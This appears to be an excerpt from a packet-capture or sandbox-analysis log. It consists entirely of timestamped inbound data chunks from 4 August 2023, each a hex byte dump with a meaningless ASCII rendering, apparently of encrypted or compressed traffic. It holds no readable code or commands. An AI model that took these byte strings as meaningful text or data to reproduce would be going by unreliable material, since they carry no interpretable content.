                                                                                      2023-08-04 16:48:39 UTC566INData Raw: 48 2f e2 f7 c8 6c 04 1c 4a 1b 26 39 15 13 d3 e4 b0 85 5c a1 57 91 58 9c 17 3f bf c0 9b f0 5f 86 58 5b b0 af 9d b3 08 bd 15 7d 95 66 35 69 6b e0 f1 b3 ff 13 e4 b2 18 c1 eb af 25 5f fe 97 9d 7c 2e b7 94 f9 1f cd c0 ed 17 38 bd 74 49 b8 91 fa 75 31 c9 8f 61 66 c0 33 42 28 55 4a ef 9d 86 52 3d 67 bf e1 cd d9 24 40 cc 05 a6 e9 c0 42 f1 d8 80 53 55 a2 c2 ca 34 d7 a2 72 9a a2 9e 4f 4b 1e 24 f5 88 97 62 d7 bf c0 29 2c d4 0a 7f ea 0f e5 fe 69 0c c6 f8 dc 20 e1 e0 7c 9b 9c 3e 28 9c 6a a9 5a 8d 01 7e 8f a5 88 b8 9f fa 87 c9 28 6a 6c e2 0d 00 74 9f c8 1c a1 fc af 99 3f 10 80 d3 40 4a 3a 46 e7 95 85 2f 6e 72 ce fe ec d4 a7 a2 01 1a 81 a2 4f 58 01 b3 9c 11 03 ef e7 72 ca 30 73 0d 2a 47 72 78 ca 57 e3 2f 8d 81 30 59 71 fd 46 b4 42 cf 65 56 f9 96 b9 39 b5 38 9d 46 36 e7
                                                                                      Data Ascii: H/lJ&9\WX?_X[}f5ik%_|.8tIu1af3B(UJR=g$@BSU4rOK$b),i |>(jZ~(jlt?@J:F/nrOXr0s*GrxW/0YqFBeV98F6
                                                                                      2023-08-04 16:48:39 UTC570INData Raw: bf fa 41 60 2c 39 88 4b 4a 15 75 4d 76 f3 8e fe b9 f0 93 72 4e 21 94 f4 0f 2a 57 50 68 93 4c 00 17 dd f1 5e 5d a3 88 8b 65 e0 74 35 2c 4a 2c 20 5c 4f 38 ef 88 93 26 c6 5a 7d 4f 76 bb 1c 09 08 7f 3e 25 82 d3 0b 14 1a aa ad 05 3b 44 ee 89 64 c0 b4 b1 af e1 20 d0 a0 48 a8 87 fe ad 7a ea 3c 09 fb 0a 9e 17 f7 42 fa 85 59 fb a8 d9 3b 84 55 6c f4 66 82 22 f0 83 87 1d 6e ab 7d d9 1c 28 5c 33 fc 26 94 89 78 10 33 f0 a9 15 20 4d 52 0e a5 7f 27 c8 f5 fc a5 8e e6 ab 64 0b 77 59 4b d2 57 d3 d8 0f 74 2b 3a 24 77 41 86 4f 5a b6 cf 90 15 f7 ef 13 70 a6 96 08 3a 38 46 43 ac 12 71 29 69 1c f1 ce 1f 50 60 c1 61 16 96 10 56 71 74 51 85 e3 bc bc 31 d3 52 aa a0 3a b1 62 6b 02 be cd a6 40 83 74 ce 4d d5 76 b8 e7 cf 30 69 e2 7c 44 50 9e 24 c6 a3 5e 10 94 8f a5 62 57 f2 76 f2 ea
                                                                                      Data Ascii: A`,9KJuMvrN!*WPhL^]et5,J, \O8&Z}Ov>%;Dd Hz<BY;Ulf"n}(\3&x3 MR'dwYKWt+:$wAOZp:8FCq)iP`aVqtQ1R:bk@tMv0i|DP$^bWv
                                                                                      2023-08-04 16:48:39 UTC574INData Raw: 0c a1 71 a1 e8 6a 66 fc 50 b2 0f 44 06 c2 31 6c 46 51 31 fb db f1 09 27 d8 09 fb e3 48 d4 b2 64 49 a0 14 5c 6d 20 21 45 f6 7e 1a 3c f6 c1 d1 de c4 7f 1a 77 9e ac 4d 4e cb 13 1c 95 a7 52 88 5f 08 ce bd af 18 6e 52 8e 92 cf 19 c1 0f 2a e3 2b 78 ac 00 00 98 a4 e0 c8 65 06 c9 47 b4 5b 5f 1e 20 21 2c 34 a5 53 67 f6 bd f0 1a f7 61 f3 7c 82 d9 a8 79 bb 8e d9 80 ad c4 4a db 2d b4 7a 9b 62 b9 7d 6f fa 6c a8 2b e5 d4 27 a2 d6 fe ab 8a 04 62 9f b8 98 bf 83 7b 93 ce f8 cc 3f d2 e0 ac db 6c 62 23 94 10 23 f4 9e 89 86 da 4f ba 98 05 a8 ec 16 c5 cf d2 7e 7a a6 72 5e 9a 71 ad ae 54 31 23 61 23 6a d4 31 bf 45 2a 1b da e6 0e 4a 54 73 e4 36 5f a6 c6 b2 2b 28 93 29 9a 65 18 2a 99 db 93 44 9e 05 0d 08 a6 65 b7 f4 64 7f 8d 01 c3 10 fa da 34 15 e8 ea 79 88 0e 04 05 83 10 6b ff
                                                                                      Data Ascii: qjfPD1lFQ1'HdI\m !E~<wMNR_nR*+xeG[_ !,4Sga|yJ-zb}ol+'b{?lb##O~zr^qT1#a#j1E*JTs6_+()e*Ded4yk
                                                                                      2023-08-04 16:48:39 UTC578INData Raw: 5f c1 ec c3 47 69 9b c2 e9 ef 42 3c 5f 8d c6 72 c5 77 62 79 a4 1e 21 bc 9e 98 02 38 56 2c 94 2c 8a fb c6 a5 e4 0b 27 5e d5 79 b3 6c 03 d5 66 8c 14 6f 6b b4 ce 61 1b e5 28 77 27 00 6e d9 bd 2f 59 8c b3 47 d0 6d d1 c1 e5 d4 43 33 ed 5c d6 49 5e bc 57 d3 20 87 c3 63 37 19 3d 54 ad 55 14 93 f2 b3 7b 53 b5 3d 8f 51 57 96 2f d5 aa 84 4b 99 29 c2 7a 5c 9e b4 ae 22 1f 7b 2c ba 8d 5d 8f 06 4f 89 d2 fc 89 35 6e 57 b1 3e 03 41 ec ba f7 e4 b4 c4 74 16 89 aa cb 18 60 80 b1 a4 b3 67 dc 0c bf cf 1d 72 e0 a8 0f 3f 6f 9f f0 65 e4 ca 06 91 3a c3 05 54 1f f1 16 d5 b9 4c 53 d0 46 3d ab 36 41 ec e7 6a 65 d0 90 25 d2 a6 0b 20 1b 9e 1c 21 cb 6d ce 7d 19 18 ba 63 80 81 93 18 e0 9d 38 38 8f ac 04 ec c8 a4 a6 e8 03 2e 6d 71 7c d7 d4 ff c7 d3 28 7d 11 79 c4 3b 1c 2d c7 0b 36 b5 bb
                                                                                      Data Ascii: _GiB<_rwby!8V,,'^ylfoka(w'n/YGmC3\I^W c7=TU{S=QW/K)z\"{,]O5nW>At`gr?oe:TLSF=6Aje% !m}c88.mq|(}y;-6
                                                                                      2023-08-04 16:48:39 UTC582INData Raw: 63 b6 d4 e4 3e 3f 2f 7b cb 6d 31 87 37 7a 9c 0c a7 f4 e4 a0 17 67 cc f7 54 9e f4 4b 03 d6 bf 7c 69 b2 61 52 d1 70 b3 50 bc 08 9d b9 a5 2c d4 71 41 c7 be 60 87 4b 83 45 c9 10 90 27 9f c6 ec c6 99 14 8c 13 79 d8 9e f1 d8 5c 9b 0c 9a 1d ef 80 58 17 e6 74 7e 80 fa b2 f9 45 2d 02 c9 60 90 5f b5 3f 0a 88 0c 5c ee 5c 7e 46 f5 f1 0f f9 e8 4f d3 b6 cd e4 3b f8 9c dd d8 d7 35 9f c7 6c d7 4c 7a 2c 78 2d 28 ba e2 8e f0 a9 22 4e fb ee 95 94 e1 46 b3 ae 10 6b 19 5b 42 7e 61 ff ff a9 62 37 48 ba 49 bc 8c 3d 2e 37 e5 3e ba 7d 08 e4 bb 3b 19 a9 4b db b8 7b 42 65 19 27 0c fd 28 e1 1a ee 71 20 e2 58 30 ba b7 d5 37 c8 b9 fc 0b ef 21 59 c6 c4 31 d6 9c ba 94 19 e1 ac b8 cf bb f1 a6 c6 f6 3c 8f 8b 51 cd ac 67 f2 64 84 56 55 66 61 02 d2 33 86 29 7a b8 a6 a9 57 19 e7 73 1e 4a ec
                                                                                      Data Ascii: c>?/{m17zgTK|iaRpP,qA`KE'y\Xt~E-`_?\\~FO;5lLz,x-("NFk[B~ab7HI=.7>};K{Be'(q X07!Y1<QgdVUfa3)zWsJ
                                                                                      2023-08-04 16:48:39 UTC586INData Raw: 3b c6 79 82 dd e1 93 c2 09 a8 1e c2 81 71 91 c2 c0 9a 7f 59 0a e9 e8 d8 79 50 cc c8 18 c5 95 88 91 6e 00 52 2d 88 58 f5 46 4e 5b 64 ee 36 51 64 8a 8e be a1 76 7e d6 20 7f e9 09 70 9a 58 40 14 5a 4d f3 e3 cb fa bd af f3 ba 7b 14 d7 13 cf 66 e3 74 6c 80 9b 3a 20 a5 bd 62 a2 5c d8 c0 1e 0c f8 77 65 4e 5b e0 b0 d5 d2 c5 20 96 79 6a 75 6d c5 9a 51 5f 53 bc 6f ec ab 23 dd 1c bf 38 93 24 a6 c7 3c 5c bd 7a c4 da 9a c0 d3 24 10 3c d3 f2 83 c9 aa 1e ea b0 dc 66 7a 9f be a3 52 7e 5e 48 9e f2 75 f5 65 9d ac 0e 21 75 6f 79 59 b6 8d fc 67 97 0e 2c df 06 d7 34 61 63 05 36 6a 43 26 5b 2b e6 5a 2f 1a 95 bf 3f cf c7 8e 93 56 61 34 f9 61 b7 06 25 cc 20 56 a1 b1 78 a7 c6 1a ac d7 48 fb 96 e3 dd 56 ff 17 f1 59 ba e0 2a c5 44 a6 fc 55 c9 9a bd f7 3d e0 c8 df 71 34 09 63 f3 7f
                                                                                      Data Ascii: ;yqYyPnR-XFN[d6Qdv~ pX@ZM{ftl: b\weN[ yjumQ_So#8$<\z$<fzR~^Hue!uoyYg,4ac6jC&[+Z/?Va4a% VxHVY*DU=q4c
                                                                                      2023-08-04 16:48:39 UTC590INData Raw: b9 10 ee 16 e3 3f c6 2e dd 8a 0c 99 ae 77 fd 5f 9b ea a8 bb bd 2e eb 10 e3 6a 03 1e 16 23 c4 d1 af 44 51 a1 68 bf c4 8b b4 c3 90 79 3e ec 5c 9e 7b 5a e3 6f f1 60 42 29 90 a2 15 47 7c f4 0b 8e 25 90 4c 5f 3a df c2 87 5f 66 7c 2b c5 37 ac bc d0 a5 ac 17 4b fb e0 3e 4e d1 0c 42 66 04 42 a8 aa 3b ce 18 43 02 93 62 c2 e7 f0 d5 4a d2 fc 93 78 a7 fa 50 19 93 8b 67 67 56 91 df 55 09 df a6 7c 31 6e 28 fb 19 78 cf d5 22 9e b2 69 c8 df 03 ba 98 30 17 24 51 7d 50 f9 59 05 24 26 40 ac 9e 34 b0 1f 96 bc 32 80 35 c8 3b a5 2e b5 74 39 8d 58 82 97 8a bf 09 c8 1e 99 ad 4a ad df 1e ec d1 2b 2b 1f 59 04 5c 23 06 c2 2b 3e 6f 7e 65 64 67 de 24 ac 1d d1 4c ce 9c 55 fa e6 c3 81 59 b5 ca c3 1e 4c 32 77 e9 ba e6 93 8c 98 38 de d6 8d 16 be 3f cb 6e d5 b8 e5 22 45 77 73 1b 34 ec 90
                                                                                      Data Ascii: ?.w_.j#DQhy>\{Zo`B)G|%L_:_f|+7K>NBfB;CbJxPggVU|1n(x"i0$Q}PY$&@425;.t9XJ++Y\#+>o~edg$LUYL2w8?n"Ews4
                                                                                      2023-08-04 16:48:39 UTC594INData Raw: e5 ca 03 25 d2 d8 9c c1 95 7d 2f 00 d0 84 1a 59 20 4d ee e1 72 25 3e 46 a7 3b 09 db 1d 82 ae 09 84 fa ab b3 df ab 37 e7 a1 1e 31 3a c3 b8 00 39 4a 9a 31 41 70 91 af 99 83 7c e2 1a 12 8f d5 fc 5a ad 29 57 af db e2 99 6e 2c 8e ab b2 44 92 a7 fa 07 2b 30 5a 90 54 7f 8d 6e 9c 0f fe 47 aa fd 49 a0 1d 35 e2 1f c8 99 30 9a 22 41 e4 d1 6c d3 a8 a7 8b b4 1a b5 a2 52 b7 01 38 c8 c6 b0 2a e6 25 7b 4f 76 8d 2b ad e2 7d 9f ef 1d 40 d4 79 11 3b a2 06 1b 59 d0 7e ee 40 3a c7 6b 3f a4 13 19 bb 02 ff 64 93 09 f5 30 42 5c 9d 7c 9d bd 6d 7e 5f f9 57 93 dc 72 25 4a 2e a1 a0 c3 0c e2 b9 37 62 20 0d 8f 7a e6 71 e0 dd 97 29 1b 4e c8 65 76 06 47 8c 8e 86 dd 63 87 1c d4 90 12 23 83 55 0d 66 6c be f9 24 05 4b 64 e6 7d 98 b2 f7 1d 77 ef 99 c3 c7 62 eb 0c f3 16 49 b9 fc 8e 01 b4 7b
                                                                                      Data Ascii: %}/Y Mr%>F;71:9J1Ap|Z)Wn,D+0ZTnGI50"AlR8*%{Ov+}@y;Y~@:k?d0B\|m~_Wr%J.7b zq)NevGc#Ufl$Kd}wbI{
                                                                                      2023-08-04 16:48:39 UTC598INData Raw: 27 d4 55 f4 38 d2 16 d1 ed ca 38 35 c3 97 0f 04 2a 37 83 d4 34 92 05 91 c6 91 bd 9c fb e2 59 ac 62 5a d4 ac 33 4c bf 02 87 79 2a 48 19 8d fa 00 8c 2f 50 b2 88 d1 2e 74 a0 6a 20 3e 2a 9b d8 33 b0 5c 75 82 3e e9 e2 30 56 81 a7 b2 b5 42 84 c9 3f f9 92 db 23 ff ef 88 d7 b8 7c dc db 63 30 ad f4 1e d4 40 a3 db 5f 8e 25 f2 6d 34 46 d7 54 21 62 9d 4e 96 d2 fc f3 d0 72 f8 57 8c 69 ba 6e d3 d5 1a 79 93 04 c5 10 ab b5 38 51 35 9e f5 35 c6 29 23 46 b4 68 fd 47 83 b3 6f 57 f5 44 47 d8 0b 77 61 1b 43 77 4b e5 45 9b 9e c9 24 77 02 ff 71 69 66 5a 3e 0f 5a b5 53 59 a5 69 d3 69 b3 3c c0 d6 d0 43 08 19 fe bc 5c 8a 96 a0 fa 50 b9 d3 54 cc c5 ca 41 5d 06 52 5a 77 6c f9 4d 8e 87 8e 08 a7 a0 9a 25 91 87 41 43 e6 ec 1c e0 c5 6d 9c e1 6f ab fa 7b d7 d2 ef b8 7e a9 7b 99 b7 b6 e2
                                                                                      Data Ascii: 'U885*74YbZ3Ly*H/P.tj >*3\u>0VB?#|c0@_%m4FT!bNrWiny8Q55)#FhGoWDGwaCwKE$wqifZ>ZSYii<C\PTA]RZwlM%ACmo{~{
                                                                                      2023-08-04 16:48:39 UTC602INData Raw: 64 2e e5 a7 1e 4d e5 3f 87 23 9e a9 d4 21 d8 55 89 ba 84 de 6c 10 19 4a 72 75 03 ce 47 0d aa 0c bb c8 a5 b1 4a 33 3d 38 94 9a ab 01 a0 08 a0 1e 7b 59 4f a1 d5 5f be 9a 2d 94 d9 b3 a7 3d 19 f2 49 9c ff b3 6d 3a 61 4c 54 ad 39 35 0d da a4 cb 52 9c 37 40 c8 cc 54 23 76 e7 90 83 4e 0f 5b e1 fa 5e 27 41 60 21 93 9f 82 8f 55 0d 8d f8 62 f7 02 04 bb 36 d1 11 20 28 34 e5 32 1c bc f3 7f 30 75 e4 f4 c0 db e3 91 88 0b ef 32 59 2d 0e 42 0b de a7 1c 9b 9d 12 04 3b bc 8f 1f cc 23 64 c7 14 25 64 51 57 a7 75 0d fa 0b 8b 26 d3 fc f8 86 7a 07 12 38 f5 a5 d4 14 94 34 15 bb fa fb d4 b6 33 d3 f9 0e 57 0b ee 6e 87 fc 5c 74 c0 5e 63 97 c2 37 54 6e 7f af b8 82 dd f8 a0 2a a1 22 d6 52 40 53 e8 78 be 57 ac 97 e8 bb 30 64 39 8d fd 24 fa b8 c9 9d f4 46 3e a1 a1 f7 02 47 2a ca 95 e2
                                                                                      Data Ascii: d.M?#!UlJruGJ3=8{YO_-=Im:aLT95R7@T#vN[^'A`!Ub6 (420u2Y-B;#d%dQWu&z843Wn\t^c7Tn*"R@SxW0d9$F>G*
                                                                                      2023-08-04 16:48:39 UTC606INData Raw: 25 53 00 b0 1a 9e 44 c2 5c ef 1f 75 c9 2e 6b 18 69 67 21 96 b6 88 f7 f3 87 32 7d 3c 58 e0 fb a2 58 0b 9c 2d 61 6c c2 bf 7a de 03 38 c0 82 b2 3a 31 19 00 96 69 75 f0 7f 03 bd 42 57 8d 3c ef 31 81 a0 46 10 f3 7f 1c 10 3d d1 49 73 cc f8 fb 8b 44 a3 40 02 8a d9 f5 2c ce 35 47 74 f5 cd f3 de 50 06 d3 65 4d ff 4e e8 3a 65 f3 14 d6 3d 3a b9 67 2b 03 c9 d5 f9 df ad d7 1b cd 78 f4 c7 fc 3f 27 97 fe e7 c4 cb ae 7c ab db 57 00 11 da ea 82 6d 23 69 b8 05 b1 b5 f0 7d d2 fe f5 e8 98 c8 e8 f1 b5 81 8d f5 06 98 b5 2f 7a 67 53 48 a3 d0 08 55 a2 cf f4 c2 ba 90 62 0a e5 3b f5 dd a7 e2 0f 6f 4f 50 ff 6e d1 33 f6 22 a2 09 ff 5e 43 c0 42 e0 ad df f8 94 ab 62 b6 6a 78 50 fb c8 b3 c5 1e 6a 4d 49 6a 62 d3 a9 0b ce 61 a7 32 b0 00 3e 69 45 49 22 bb f8 d0 9a 6d 65 3d 75 db f2 00 63
                                                                                      Data Ascii: %SD\u.kig!2}<XX-alz8:1iuBW<1F=IsD@,5GtPeMN:e=:g+x?'|Wm#i}/zgSHUb;oOPn3"^CBbjxPjMIjba2>iEI"me=uc
                                                                                      2023-08-04 16:48:39 UTC610INData Raw: 72 f5 c2 f1 ac 6d e6 db 82 cc 89 12 55 00 45 d6 7a 90 c8 60 f2 57 6e 67 65 2e 98 71 47 02 33 20 fa dd 5e 2e 35 5f c3 e0 db 78 9c 73 50 62 43 3d f6 40 9c 13 a5 0b 3e 94 3a 73 73 f2 87 b2 08 d5 a5 00 62 84 9a e8 8b 2e ef a7 80 b8 aa 61 2b 1f 66 e4 75 59 72 60 a4 cf 23 82 0c 23 b3 87 14 26 41 bd a6 8a f9 1d 7f ef 41 bf 9e 42 a9 36 a1 e5 89 25 0f 43 47 cd 5e f2 05 34 99 0f 82 9c 08 ea a5 f2 7d 2a 15 cd c5 d8 3e 35 ed ce b8 27 99 3d 59 b1 6b 77 b3 3c c0 ac fa 88 21 41 91 b0 c1 23 25 08 9b 49 1f 7b f9 a7 20 f4 e2 dc dc 0b d3 c5 c7 43 08 dc d1 e8 ab 98 c8 7a 7d 67 ce 03 53 d9 14 0e 5f 29 92 97 20 16 ad c2 3b 51 c4 a2 e1 90 ea 4a d2 a1 57 5f ac b8 fd f8 22 ec b2 6e 43 38 2a 33 80 30 74 18 9c ea 37 78 6b ee 07 ee 41 ce 07 03 1f 40 91 4e 2f c6 7e e6 35 54 e9 c8 0d
                                                                                      Data Ascii: rmUEz`Wnge.qG3 ^.5_xsPbC=@>:ssb.a+fuYr`##&AAB6%CG^4}*>5'=Ykw<!A#%I{ Cz}gS_) ;QJW_"nC8*30t7xkA@N/~5T
                                                                                      2023-08-04 16:48:39 UTC614INData Raw: 8d 19 9d 20 54 27 10 7b 65 81 73 a3 18 7c 2b 82 4d 64 39 e6 50 84 ff 18 05 9d 4c 28 cf 6e 8b f4 f2 57 61 97 1e 49 a2 46 f0 0f 52 94 93 2a 2b 00 c4 f2 de ed 28 1c da 80 b5 ef e5 89 d6 8a 80 ef b2 66 d9 66 71 14 bd cc 78 59 f4 65 4c ee f8 e4 26 33 32 8b b5 c5 af 18 30 c5 ca 53 13 09 a7 65 d1 8b e9 0a d3 81 6b 00 df 90 dd 23 62 25 72 b8 4f dc 11 e7 c0 2d a0 37 8e e9 73 24 8d d6 5b 36 38 a3 7f c8 08 3b 04 83 8e 40 3d 85 c1 2d 68 10 64 53 d8 19 13 3e 89 66 44 af a6 5c 02 bd f6 df 50 1c fd 41 3c 9c 16 20 0b 87 d9 76 ef 5c 0b 55 6c fe a5 5b 26 f3 4e b9 85 03 2f 07 cc 27 63 77 fb a3 47 1d f6 6a 76 e6 4e a5 49 0f 3e 8e 15 6d a4 f1 42 08 f1 65 2e 36 5d 7e 44 01 7f 65 8e ef d8 bd 61 46 66 9d dd e9 0d ba f9 59 21 6f e3 d5 9e 36 71 9c 4d 05 3a c3 4b 30 05 23 4c 6a b3
                                                                                      Data Ascii: T'{es|+Md9PL(nWaIFR*+(ffqxYeL&320Sek#b%rO-7s$[68;@=-hdS>fD\PA< v\Ul[&N/'cwGjvNI>mBe.6]~DeaFfY!o6qM:K0#Lj
                                                                                      2023-08-04 16:48:39 UTC618INData Raw: 93 50 b7 ae b1 f1 69 00 48 9a 3b 6e 37 00 c1 43 8e f3 78 04 a2 22 3c 43 3b b5 1a ca da 4d 4a 34 33 6f 4a 1e e9 14 21 ae c7 02 87 97 6f a7 65 f9 15 19 ef 9e 72 82 05 9a a4 81 8c 00 56 0b 1d 72 47 63 8f 01 f3 29 f1 a5 05 8a 1f 42 c2 1e c7 af fe 99 73 96 39 5a a0 eb 3a b5 fb 53 34 16 5e b3 34 d1 97 6a 08 e8 e3 d3 aa 76 70 bd 8e 91 e9 24 49 1f c2 07 c7 ce fa 25 bf e4 40 50 c2 65 e3 ba 38 02 42 6a 98 f8 10 56 7b e2 a4 24 c8 91 c4 f7 bd 71 c6 27 0f ac c8 29 11 f1 6d bd cb 2b 26 3c 11 c7 03 89 b7 8a bb dc 60 9f e7 2b 49 0c 55 35 f8 b2 f2 a0 dc 0e 9a bb d7 b2 27 54 3a 05 cc 73 06 34 c1 96 fc 96 da 24 aa 5e 50 63 ca b3 15 52 36 5d d4 b8 3e 12 08 4c 86 b6 00 c0 8c 19 c4 1a 8d 38 18 3e c0 18 cd 33 e3 27 d5 87 ad 9b 77 7b a5 a7 87 7d 2b 28 c7 3a cd 37 69 a9 c3 6f 82
                                                                                      Data Ascii: PiH;n7Cx"<C;MJ43oJ!oerVrGc)Bs9Z:S4^4jvp$I%@Pe8BjV{$q')m+&<`+IU5'T:s4$^PcR6]>L8>3'w{}+(:7io
                                                                                      2023-08-04 16:48:39 UTC622INData Raw: 48 34 27 db 39 14 f2 49 6c 03 ef aa 30 7e 0e 2e 53 43 8a 5c 99 c9 7c 6e f8 eb 30 3f 2f 59 47 f2 47 45 4b 9b 64 b2 75 c1 91 9d 87 27 4a 62 44 3e 68 cf 3e c4 e0 b6 08 60 23 18 40 a0 06 04 3a ce 55 48 6c a1 83 64 39 04 ad 6e b7 bb 7a ea 7d c9 b0 08 b4 50 44 f2 ff 9d ce d4 4d 89 e9 f2 88 0c bf fb 57 91 d0 29 6f aa 5f 14 36 6a 7a 54 85 30 48 41 36 9e b2 0f 79 c7 a8 a7 f6 61 d7 94 cb 7f 73 77 d2 ac d6 46 ac 62 68 9a 44 6c 82 15 2a 9f 01 d5 5e 15 b9 99 43 c6 0e 67 a8 45 1b 2d a8 95 1d 51 cc 7d 30 97 26 aa 79 2e 77 29 60 74 99 a3 37 bd 3c 9b 46 b0 a7 e1 c1 19 6f 3f 6c 9d e3 6d 80 df b7 da b5 b6 50 11 49 ba bd 61 52 39 bb cf cb 23 1d 6b 72 16 4e c6 d2 11 6f 5a a8 84 82 85 a4 a7 6a 99 62 27 a9 5b f9 78 4f 88 aa a8 b8 de 88 c3 a8 61 e7 c7 62 08 e2 0c 37 5f 59 b7 5f
                                                                                      Data Ascii: H4'9Il0~.SC\|n0?/YGGEKdu'JbD>h>`#@:UHld9nz}PDMW)o_6jzT0HA6yaswFbhDl*^CgE-Q}0&y.w)`t7<Fo?lmPIaR9#krNoZjb'[xOab7_Y_
                                                                                      2023-08-04 16:48:39 UTC626INData Raw: 59 40 41 ff 52 82 8b c1 ab 0f 94 f4 24 5b f6 7b 88 7a 39 c1 aa 1c 91 8d 7f c8 8e 35 1a c0 c1 70 39 06 d5 fc 6e 52 11 74 c0 d8 9e 9d 76 32 19 d3 49 eb 6c 44 7a 10 c1 85 2e 32 73 ed a5 3a 92 78 90 74 73 b5 17 09 a0 07 4c 7b 0c 59 83 07 3d ce 51 70 73 dd 5e 07 e5 26 15 b8 6b 43 4f 64 94 d2 48 be 79 b9 50 c4 dd 58 c4 3f e6 bf 6b 5d b9 8a aa ac a8 73 c0 e4 a9 92 fb 18 30 2a d8 23 37 df 6a 47 00 78 98 ff 6c 0a 87 d3 ee fc 8f 8e b2 2f 8e 65 ef 59 d6 ee 1f 29 38 4d 1c 0f 78 1d b7 31 9a 1a d8 64 f0 d3 f1 31 49 16 b5 38 48 c0 bd 27 df 44 fe 4d bf cc 23 3f 74 d2 18 7e 6e 9f 32 a9 52 4e a2 aa 7d c7 ec 07 f6 59 f9 23 89 b0 a1 78 f6 98 d4 ae a5 6d b5 82 83 ce 25 11 ce 9a 39 7f 2e 54 d7 1a 0c f6 91 b5 98 21 e6 7f e9 a1 ab 0d 62 ca 61 ba 1e e0 1a 3b 4d a5 b6 d6 9e 5a 65
                                                                                      Data Ascii: Y@AR$[{z95p9nRtv2IlDz.2s:xtsL{Y=Qps^&kCOdHyPX?k]s0*#7jGxl/eY)8Mx1d1I8H'DM#?t~n2RN}Y#xm%9.T!ba;MZe
                                                                                      2023-08-04 16:48:39 UTC630INData Raw: d0 80 3b 60 ce 6c f8 49 0d da 1a 28 14 32 37 ff 05 25 d0 29 6f f6 ce af fa 8d 9e cb 2d 2a d8 d1 f9 04 47 15 3f a1 8c f4 4f 7c fa 33 cd 23 cf 23 49 08 b7 dc bc 05 80 56 ff 8a 1f bb b6 61 ce 41 20 f4 6d a6 1d 9c 23 00 af af 57 d2 db 23 ff 26 81 99 49 a7 95 51 cf 83 22 28 67 5f 76 bb 83 0b 5a 6c cb 20 fe c0 da ed 47 b8 9f a6 12 aa 7e 09 b2 bb c4 36 39 ac 63 25 83 6d b6 a1 3c d1 ff 4e 6f 3f b9 1c fe d1 6c 92 e3 e2 88 5d ae 34 24 c3 cb 2a bf 09 d6 96 86 b8 98 8c 16 a9 f2 52 d8 0d ca 6a 48 ab 49 0f 0a 0a 96 64 52 ec 02 dc a6 24 a8 0b 14 ba e6 f5 43 0e 30 56 c2 92 c2 d7 d7 6b 8a 16 fe 50 a0 9f 17 6f 63 6d 2f 96 3d 32 2a 12 1e 00 76 f6 f5 32 a8 79 2f a3 d8 de 85 bc f2 42 2e c6 05 ec 9b 54 b5 e8 78 36 28 48 86 a1 4a e3 bb 85 1f 15 19 78 d3 b7 f1 ed f1 86 f4 c7 83
                                                                                      Data Ascii: ;`lI(27%)o-*G?O|3##IVaA m#W#&IQ"(g_vZl G~69c%m<No?l]4$*RjHIdR$C0VkPocm/=2*v2y/B.Tx6(HJx
                                                                                      2023-08-04 16:48:39 UTC634INData Raw: 08 16 87 11 4a 57 3d f0 36 98 c2 48 f8 73 99 df 58 34 18 58 f3 8e cd 62 f6 7f 45 c9 7c 3a db 27 8d 2f aa 1b 11 78 2c 7b d2 4a 04 ad da a4 c9 d6 ab d6 7a a1 7e 05 2e 56 e2 12 34 49 f6 fc 86 92 0a 20 56 8b 47 11 fc 85 df 13 29 37 65 b9 59 0d b6 6f da 6f 2d 8e bf 2a 5f 79 73 a3 e7 de 56 c8 ab 22 0d 29 e4 9d 96 07 39 df 57 42 a7 12 b1 e0 fc 37 93 37 59 16 8d b9 bc 61 b9 bc a1 e3 b4 40 9e f8 f2 9f 06 f1 c3 c5 bf 0b 52 48 23 6c fe b9 43 ce c8 17 1d 3a 78 c7 c1 d8 d4 37 36 f9 15 89 d9 1f 2a f8 2b c5 c3 e7 c5 49 a8 21 73 c8 d0 0e 72 2b 1f c3 74 77 92 34 b4 cd a4 7b f0 e4 30 e1 4e 31 bb 90 f3 57 b3 df 53 77 54 0d f7 29 6f ec 2c 60 d9 57 13 1f e1 f1 f1 5f db df bf d1 ed 06 22 bc 46 17 ee 8b e6 54 22 12 ff 9a 06 7f 92 a7 3d 21 49 ac 6c 0b 55 3f dc ee 98 89 35 98 84
                                                                                      Data Ascii: JW=6HsX4XbE|:'/x,{Jz~.V4I VG)7eYoo-*_ysV")9WB77Ya@RH#lC:x76*+I!sr+tw4{0N1WSwT)o,`W_"FT"=!IlU?5
                                                                                      2023-08-04 16:48:39 UTC638INData Raw: 8f 79 68 32 29 44 ac 64 f2 d5 2a 1a 14 ed 07 af 17 be 6a 8e 67 8f 12 50 ae aa a2 08 a1 b7 b3 39 b8 8d 12 f3 08 df 46 66 d5 84 e3 38 fc 08 50 d0 07 2b 2b 62 78 2c 76 d7 64 57 c3 5e a1 07 53 63 9d eb 1f e1 a2 0e 47 31 09 32 11 3b 44 ce 28 44 e0 d6 24 a2 61 c6 31 47 20 fc 0e 70 e1 4c b4 32 b8 89 c9 16 49 7b c9 72 77 78 e4 a1 af 5d b6 62 7c c8 53 ce d9 84 84 f7 85 01 aa 27 fb 79 78 2b dc 5a 02 10 d4 70 ec 6c 54 bd 62 8b 8b 3e af 18 35 1b 45 cf 70 00 bb 10 6d 09 98 a2 08 c2 79 a7 4b f3 fd 34 fd 32 e4 02 96 7b 2c 38 b1 39 49 ae c8 d8 c0 96 b7 02 0a 7c 4b 74 41 c6 f7 cd 7a ca 99 84 97 92 d1 e5 17 57 1d da 71 9d bc a7 8d f9 43 9b aa 31 c2 be 8d 52 63 8c 67 54 88 3e 14 a1 83 aa 89 5f c4 1a 6a 98 f0 d4 5c b4 5a 8b 31 c6 75 e0 c9 3b 30 69 0c 0a ee 3b a3 13 34 55 90
                                                                                      Data Ascii: yh2)Dd*jgP9Ff8P++bx,vdW^ScG12;D(D$a1G pL2I{rwx]b|S'yx+ZplTb>5EpmyK42{,89I|KtAzWqC1RcgT>_j\Z1u;0i;4U
